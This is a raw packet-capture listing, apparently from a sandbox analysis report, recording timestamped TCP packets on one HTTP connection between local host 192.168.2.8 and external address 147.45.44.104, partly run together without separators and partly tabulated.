                                                                              Oct 8, 2024 03:23:04.854677916 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.854691982 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.854718924 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855267048 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855317116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855335951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855381012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855407000 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855438948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855446100 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855457067 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855473042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.855484962 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.855525970 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856412888 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856435061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856447935 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856493950 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856529951 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856539965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856558084 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856568098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856584072 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856589079 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856610060 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856633902 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.856643915 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856653929 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.856700897 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857108116 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857187986 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857316017 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857362986 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857428074 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857438087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857459068 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857470036 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857477903 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857491016 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857502937 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857527018 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857558966 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857570887 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857588053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857599020 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857614040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.857619047 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.857656002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858127117 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858200073 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858221054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858232021 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858251095 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858261108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858275890 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858279943 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858294010 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858308077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858319998 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858340025 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858347893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858381987 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858396053 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858409882 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858422995 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858458042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858478069 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858481884 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858505011 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858505964 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858545065 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858586073 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858597994 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858614922 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858627081 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.858639002 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.858688116 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.894501925 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.894515991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.894587040 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.939213037 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.939229012 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.939248085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.939312935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942516088 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942549944 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942560911 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942619085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942630053 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942631006 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942655087 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942666054 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942682981 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942723989 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942750931 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942751884 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942795038 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942804098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942857027 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942912102 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942966938 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.942982912 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.942992926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.943022013 CEST8049706147.45.44.104192.168.2.8
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 8, 2024 03:23:04.943032026 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943054914 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943054914 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.943064928 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943109989 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943110943 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.943125963 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943136930 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.943146944 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943156958 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943176031 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.943197966 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.943260908 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943332911 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943346977 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943356991 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943403006 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943406105 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.943414927 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943433046 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.943454027 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944112062 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944120884 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944139004 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944163084 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944190025 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944200993 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944201946 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944220066 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944231033 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944243908 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944247961 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944272995 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944278002 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944284916 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944302082 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944328070 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944329977 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944364071 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.944369078 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.944413900 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945291996 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945302963 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945341110 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945415020 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945425987 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945446968 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945467949 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945596933 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945640087 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945647001 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945660114 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945678949 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945720911 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945769072 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945790052 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945800066 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945813894 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945816994 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945832014 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945848942 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945858002 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945858002 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945878029 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945888042 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945905924 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945907116 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945918083 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.945929050 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.945964098 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.946129084 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946158886 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946171045 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946197987 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.946237087 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946249008 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946265936 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946279049 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946285009 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.946297884 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946312904 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946322918 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.946347952 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.946351051 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946362972 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946379900 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946391106 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.946403027 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.946428061 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947042942 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947053909 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947073936 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947099924 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947122097 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947133064 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947134018 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947153091 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947171926 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947182894 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947184086 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947206020 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947221041 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947222948 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947231054 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947247982 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947252035 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947263002 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947284937 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947309017 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947309017 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947320938 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947336912 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947357893 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947742939 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947784901 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947786093 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947798014 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947815895 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947829008 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.947843075 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.947871923 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948045015 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948056936 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948076963 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948124886 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948147058 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948168039 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948182106 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948189020 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948195934 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948235989 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948240042 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948251009 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948273897 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948283911 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948302984 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948306084 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948333025 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948343992 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948344946 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948364019 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948373079 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.948406935 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948441029 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.948574066 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.949028969 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949040890 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949060917 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949074030 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949110031 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.949120998 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949135065 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949148893 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.949155092 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949168921 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.949184895 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.949229002 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.982698917 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982712030 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982729912 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982738972 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982757092 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982767105 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982784986 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982795954 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:04.982803106 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:04.982886076 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.026235104 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026247978 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026266098 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026293993 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026304960 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.026310921 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026328087 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026335001 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.026341915 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026360989 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.026388884 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.026407957 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.029171944 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029278040 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029289007 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029304981 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029316902 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029329062 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029335022 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.029351950 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029366016 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029386044 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.029405117 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.029802084 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029834032 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029844999 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029874086 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.029891968 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029901981 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029918909 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029932976 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029942036 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.029948950 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.029980898 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.030000925 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.030015945 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030026913 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030064106 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030066967 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.030075073 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030092955 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030142069 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.030148029 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030164003 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030177116 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030190945 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.030191898 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030236006 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.030987978 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.030998945 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031014919 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031023979 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031035900 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.031056881 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.031169891 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031213999 CEST  49706        80         192.168.2.8    147.45.44.104
Oct 8, 2024 03:23:05.031229973 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031239986 CEST  80           49706      147.45.44.104  192.168.2.8
Oct 8, 2024 03:23:05.031277895 CEST  49706        80         192.168.2.8    147.45.44.104
